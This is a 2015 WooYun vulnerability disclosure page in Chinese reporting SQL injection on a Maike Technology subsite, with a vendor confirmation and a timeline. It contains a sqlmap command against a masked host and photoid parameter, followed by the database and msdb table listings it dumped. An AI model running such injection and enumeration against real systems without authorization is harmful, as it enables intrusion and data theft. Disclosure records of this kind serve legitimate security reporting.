迈科科技某分站存在SQL注射漏洞 | wooyun-2015-0159128| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0159128

漏洞标题：迈科科技某分站存在SQL注射漏洞

漏洞作者：冷白开。

提交时间：2015-12-08 16:39

修复时间：2016-01-23 15:16

公开时间：2016-01-23 15:16

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：已交由第三方合作机构(广东省信息安全测评中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-12-08：细节已通知厂商并且等待厂商处理中
2015-12-10：厂商已经确认，细节仅向厂商公开
2015-12-20：细节向核心白帽子及相关领域专家公开
2015-12-30：细节向普通白帽子公开
2016-01-09：细节向实习白帽子公开
2016-01-23：细节向公众公开

简要描述：

迈科科技某分站存在SQL注射漏洞

详细说明：

sqlmap.py -u "**.**.**.**:9090//showphoto.xf?photoid=1" --dbs

available databases [9]:
[*] FE_APP5
[*] FE_BASE5
[*] FE_ERP
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
Database: msdb
[136 tables]
+-----------------------------------------------------+
| MSdatatype_mappings                                 |
| MSdbms                                              |
| MSdbms_datatype                                     |
| MSdbms_datatype_mapping                             |
| MSdbms_map                                          |
| backupfile                                          |
| backupfilegroup                                     |
| backupmediafamily                                   |
| backupmediaset                                      |
| backupset                                           |
| log_shipping_monitor_alert                          |
| log_shipping_monitor_error_detail                   |
| log_shipping_monitor_history_detail                 |
| log_shipping_monitor_primary                        |
| log_shipping_monitor_secondary                      |
| log_shipping_primaries                              |
| log_shipping_primary_databases                      |
| log_shipping_primary_secondaries                    |
| log_shipping_secondaries                            |
| log_shipping_secondary                              |
| log_shipping_secondary_databases                    |
| logmarkhistory                                      |
| restorefile                                         |
| restorefilegroup                                    |
| restorehistory                                      |
| sqlagent_info                                       |
| suspect_pages                                       |
| sysalerts                                           |
| syscachedcredentials                                |
| syscategories                                       |
| syscollector_blobs_internal                         |
| syscollector_collection_items                       |
| syscollector_collection_items_internal              |
| syscollector_collection_sets                        |
| syscollector_collection_sets_internal               |
| syscollector_collector_types                        |
| syscollector_collector_types_internal               |
| syscollector_config_store                           |
| syscollector_config_store_internal                  |
| syscollector_execution_log                          |
| syscollector_execution_log_full                     |
| syscollector_execution_log_internal                 |
| syscollector_execution_stats                        |
| syscollector_execution_stats_internal               |
| syscollector_tsql_query_collector                   |
| sysdatatypemappings                                 |
| sysdbmaintplan_databases                            |
| sysdbmaintplan_history                              |
| sysdbmaintplan_jobs                                 |
| sysdbmaintplans                                     |
| sysdownloadlist                                     |
| sysdtscategories                                    |
| sysdtspackagelog                                    |
| sysdtspackages                                      |
| sysdtssteplog                                       |
| sysdtstasklog                                       |
| sysjobactivity                                      |
| sysjobhistory                                       |
| sysjobs                                             |
| sysjobs_view                                        |
| sysjobschedules                                     |
| sysjobservers                                       |
| sysjobsteps                                         |
| sysjobstepslogs                                     |
| sysmail_account                                     |
| sysmail_allitems                                    |
| sysmail_attachments                                 |
| sysmail_attachments_transfer                        |
| sysmail_configuration                               |
| sysmail_event_log                                   |
| sysmail_faileditems                                 |
| sysmail_log                                         |
| sysmail_mailattachments                             |
| sysmail_mailitems                                   |
| sysmail_principalprofile                            |
| sysmail_profile                                     |
| sysmail_profileaccount                              |
| sysmail_query_transfer                              |
| sysmail_send_retries                                |
| sysmail_sentitems                                   |
| sysmail_server                                      |
| sysmail_servertype                                  |
| sysmail_unsentitems                                 |
| sysmaintplan_log                                    |
| sysmaintplan_logdetail                              |
| sysmaintplan_plans                                  |
| sysmaintplan_subplans                               |
| sysmanagement_shared_registered_servers             |
| sysmanagement_shared_registered_servers_internal    |
| sysmanagement_shared_server_groups                  |
| sysmanagement_shared_server_groups_internal         |
| sysnotifications                                    |
| sysoperators                                        |
| sysoriginatingservers                               |
| sysoriginatingservers_view                          |
| syspolicy_conditions                                |
| syspolicy_conditions_internal                       |
| syspolicy_configuration                             |
| syspolicy_configuration_internal                    |
| syspolicy_execution_internal                        |
| syspolicy_facet_events                              |
| syspolicy_management_facets                         |
| syspolicy_object_sets                               |
| syspolicy_object_sets_internal                      |
| syspolicy_policies                                  |
| syspolicy_policies_internal                         |
| syspolicy_policy_categories                         |
| syspolicy_policy_categories_internal                |
| syspolicy_policy_category_subscriptions             |
| syspolicy_policy_category_subscriptions_internal    |
| syspolicy_policy_execution_history                  |
| syspolicy_policy_execution_history_details          |
| syspolicy_policy_execution_history_details_internal |
| syspolicy_policy_execution_history_internal         |
| syspolicy_system_health_state                       |
| syspolicy_system_health_state_internal              |
| syspolicy_target_set_levels                         |
| syspolicy_target_set_levels_internal                |
| syspolicy_target_sets                               |
| syspolicy_target_sets_internal                      |
| sysproxies                                          |
| sysproxylogin                                       |
| sysproxyloginsubsystem_view                         |
| sysproxysubsystem                                   |
| sysschedules                                        |
| sysschedules_localserver_view                       |
| syssessions                                         |
| sysssislog                                          |
| sysssispackagefolders                               |
| sysssispackages                                     |
| syssubsystems                                       |
| systargetservergroupmembers                         |
| systargetservergroups                               |
| systargetservers                                    |
| systargetservers_view                               |
| systaskids                                          |
+-----------------------------------------------------+

漏洞证明：

综上

修复方案：

你们懂

版权声明：转载请注明来源冷白开。@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2015-12-10 14:44

厂商回复：

非常感谢您的报告。
报告中的问题已确认并复现.
影响的数据：高
攻击成本：低
造成影响：高
综合评级为：高，rank：10
正在联系相关网站管理单位处置。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0159128

漏洞标题：迈科科技某分站存在SQL注射漏洞

相关厂商：广东省信息安全测评中心

漏洞作者：冷白开。

提交时间：2015-12-08 16:39

修复时间：2016-01-23 15:16

公开时间：2016-01-23 15:16

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：已交由第三方合作机构(广东省信息安全测评中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源冷白开。@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0159128

漏洞标题：迈科科技某分站存在SQL注射漏洞

相关厂商：广东省信息安全测评中心

漏洞作者： 冷白开。

提交时间：2015-12-08 16:39

修复时间：2016-01-23 15:16

公开时间：2016-01-23 15:16

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：已交由第三方合作机构(广东省信息安全测评中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0159128"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 冷白开。@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：冷白开。

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源冷白开。@乌云